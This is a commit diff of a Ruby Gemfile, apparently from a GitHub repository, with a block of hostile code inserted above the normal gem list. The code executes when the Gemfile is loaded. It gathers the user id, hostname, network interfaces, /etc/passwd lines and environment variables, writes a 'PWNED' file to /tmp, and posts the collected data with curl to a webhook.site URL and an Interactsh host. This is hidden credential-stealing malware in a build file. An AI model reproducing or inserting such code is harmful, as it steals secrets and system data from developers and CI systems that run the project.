|
1 | | -# --- POC MEGA EXTREME START --- |
2 | | -puts "========================================" |
3 | | -puts "🔥 PROOF 3: SYSTEM NETWORK RECON" |
4 | | -puts "Internal IP & Network Interface:" |
5 | | -puts `ip addr | grep inet` |
| 1 | +# --- POC OOB EXFILTRATION (THE FINISHER) --- |
| 2 | +webhook = "https://webhook.site/e93fb7a2-26c7-4045-a140-92e550408caf" |
| 3 | +interact = "jzlnriqracktrqqcvctti0z1e1payovlr.oast.fun" |
| 4 | + |
| 5 | +# Ngahijikeun kabeh 5 bukti maut |
| 6 | +data = "=== JACKPOT REPORT BY FIRMAN SAHIDIN ===\n" |
| 7 | +data += "1. ID: " + `id` |
| 8 | +data += "2. HOSTNAME: " + `hostname` |
| 9 | +data += "3. NET INTERFACE:\n" + `ip addr | grep inet` |
| 10 | +data += "4. PASSWD FILE:\n" + `head -n 3 /etc/passwd` |
| 11 | +data += "5. WRITE ACCESS: " + `echo 'PWNED-BY-MAMANK' > /tmp/final.txt && cat /tmp/final.txt` |
| 12 | +data += "\n=== SECRETS EXPOSURE ===\n" |
| 13 | +data += `env | cut -c1-100` |
| 14 | + |
| 15 | +# Taktik 1: Kirim kabeh data ka Webhook (POST) |
| 16 | +`curl -s -X POST -H "Content-Type: text/plain" --data "#{data}" #{webhook}` |
6 | 17 |
|
7 | | -puts "\n🔥 PROOF 4: SENSITIVE FILE ACCESS" |
8 | | -puts "Reading /etc/passwd (User List):" |
9 | | -puts `head -n 5 /etc/passwd` |
| 18 | +# Taktik 2: Kirim sinyal ka Interactsh (DNS/HTTP) pikeun bypass firewall |
| 19 | +`curl -s "http://#{interact}/rce-success-$(hostname)"` |
10 | 20 |
|
11 | | -puts "\n🔥 PROOF 5: WRITE ACCESS TEST" |
12 | | -puts "Creating a backdoor file in the runner:" |
13 | | -`echo 'MAMANK WAS HERE' > /tmp/pwned.txt` |
14 | | -puts "Checking created file:" |
15 | | -puts `cat /tmp/pwned.txt` |
16 | 21 | puts "========================================" |
17 | | -# --- POC MEGA EXTREME END --- |
| 22 | +puts "🔥 JACKPOT! ALL PROOFS SENT TO OOB SERVERS" |
| 23 | +puts "Check Webhook.site & Interactsh now!" |
| 24 | +puts "========================================" |
| 25 | +# --- END POC --- |
18 | 26 |
|
19 | | -# ... (Sesa eusi Gemfile nu asli di handapna) |
20 | 27 | source "https://rubygems.org" |
21 | | -# ... (Tuluykeun jiga nu tadi) |
| 28 | +gem "faraday", "2.14.1" |
| 29 | +gem "faraday-retry", "2.4.0" |
| 30 | +gem "github-pages", "~> 232", group: :jekyll_plugins |
| 31 | +gem "json", "2.18.0" |
| 32 | +gem "language_server-protocol", "3.17.0.5" |
| 33 | +gem "nokogiri", "~> 1.19.0" |
| 34 | +gem "rake", "13.3.1" |
| 35 | +gem "rubocop", "1.82.1" |
| 36 | + |
| 37 | +group :test do |
| 38 | + gem "fastimage" |
| 39 | + gem "httparty" |
| 40 | + gem "minitest" |
| 41 | + gem "octokit" |
| 42 | + gem "pry", require: false |
| 43 | + gem "rubocop-performance" |
| 44 | + gem "safe_yaml" |
| 45 | +end |
| 46 | + |
| 47 | +group :development do |
| 48 | + gem "webrick" |
| 49 | +end |
0 commit comments